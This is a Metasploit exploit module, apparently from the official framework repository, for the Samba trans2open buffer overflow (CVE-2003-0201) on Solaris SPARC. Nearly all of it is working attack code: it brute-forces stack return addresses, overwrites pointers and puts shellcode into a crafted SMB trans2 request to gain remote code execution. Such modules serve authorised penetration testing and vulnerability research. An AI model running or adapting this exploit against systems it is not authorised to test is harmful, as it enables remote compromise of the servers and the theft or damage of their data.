GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/samba/trans2open.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
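class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Brute

  # Declares module metadata: name, references, payload constraints and
  # the per-target bruteforce ranges consumed by Msf::Exploit::Brute.
  #
  # @param info [Hash] additional module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba trans2open Overflow (Solaris SPARC)',
        'Description' => %q{
          This exploits the buffer overflow found in Samba versions
          2.2.0 to 2.2.8. This particular module is capable of
          exploiting the flaw on Solaris SPARC systems that do not
          have the noexec stack option set. Big thanks to MC and
          valsmith for resolving a problem with the beta version of
          this module.
        },
        'Author' => ['hdm', 'jduck'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2003-0201'],
          ['OSVDB', '4469'],
          ['BID', '7294'],
          ['URL', 'https://seclists.org/bugtraq/2003/Apr/103']
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00",
          'MinNops' => 512
        },
        'Platform' => 'solaris',
        # Each target supplies the values brute_exploit reads:
        #   'PtrToNonZero' - stack address used to patch overwritten pointers
        #   'Offset'       - byte offset in the request where patching starts
        #   'Bruteforce'   - Ret range and step walked by Msf::Exploit::Brute
        'Targets' => [
          [
            'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',
            {
              'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack
              'Offset' => 1103,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xffbffaf0 },
                'Stop' => { 'Ret' => 0xffbfa000 },
                'Step' => 128
              }
            }
          ],
          [
            'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',
            {
              'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack
              'Offset' => 1103,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xffbefaf0 },
                'Stop' => { 'Ret' => 0xffbea000 },
                'Step' => 128
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2003-04-07',
        # Each bruteforce attempt can crash smbd (restarted by the parent),
        # and every request is visible in the Samba logs.
        'Notes' => {
          'AKA' => ['ECHOWRECKER'],
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(139)
    ])

    # The protocol version is fixed by brute_exploit (connect with
    # versions: [1]), so the user-facing option is removed.
    deregister_options('SMB::ProtocolVersion')
  end

  # One bruteforce iteration: connects with SMB protocol version 1,
  # authenticates, builds a request whose overflow region is patched with
  # the target's stack pointers and the candidate return address, sends it,
  # then hands off to the payload handler.
  #
  # Errors from the network layer and from the SMB client are reported with
  # print_error and swallowed so that Msf::Exploit::Brute can move on to the
  # next return address.
  #
  # @param addrs [Hash] current bruteforce step; only 'Ret' is read here
  # @return [void]
  def brute_exploit(addrs)
    curr_ret = addrs['Ret']
    print_status('Trying return address 0x%.8x...' % curr_ret)

    connect(versions: [1])
    smb_login

    #
    # The obstacle course:
    # outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
    # smb_dump(smb_fn_name(type), 0, outbuf, outsize);
    # return(outsize);
    #

    # This value *must* be 1988 to allow findrecv shellcode to work
    pattern = rand_text_english(1988)

    #
    # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
    #
    # Patch the overwritten heap pointers
    # substr($pattern, 1159, 4, pack('N', $target->[4]));
    # substr($pattern, 1163, 4, pack('N', $target->[4]));
    #
    # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
    # substr($pattern, 1195, 4, pack('N', 0xffffffff));
    #
    # Fix the frame pointer (need to check for null in address)
    # substr($pattern, 1243, 4, pack('N', $target->[3]-64));
    #
    # Finally set the return address
    # substr($pattern, 1247, 4, pack('N', $curr_ret));
    #

    #
    # This method is more reliable against a wider range of targets
    #

    off = target['Offset']
    ptr_to_non_zero = target['PtrToNonZero']

    # Local variable pointer patches for early versions of 2.2.x
    pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9
    off += 36

    # Overwrite heap pointers with a ptr to NULL at the top of the stack
    pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10
    off += 40

    # Patch the type index into the smb_messages[] array...
    # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
    pattern[off, 20] = [0xffffffff].pack('N') * 5
    off += 20

    # This stream covers the framepointer and the return address
    pattern[off, 400] = [curr_ret].pack('N') * 100

    # Stuff the shellcode into the request
    pattern[3, payload.encoded.length] = payload.encoded

    # Fixed SMB/trans2 header bytes followed by the patched pattern.
    trans =
      "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00" \
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" \
      "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00" \
      "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01" \
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90" +
      pattern

    sock.put(trans)
    handler
    disconnect
  # The EOFError clause previously used `e` without binding it, so a closed
  # connection raised NameError from inside the handler instead of being
  # reported. Bind the exception here; EOFError is a StandardError subclass,
  # so the dedicated clause only gives it its own place to log.
  rescue EOFError => e
    print_error(e.to_s)
  rescue StandardError => e
    print_error(e.to_s)
  end
end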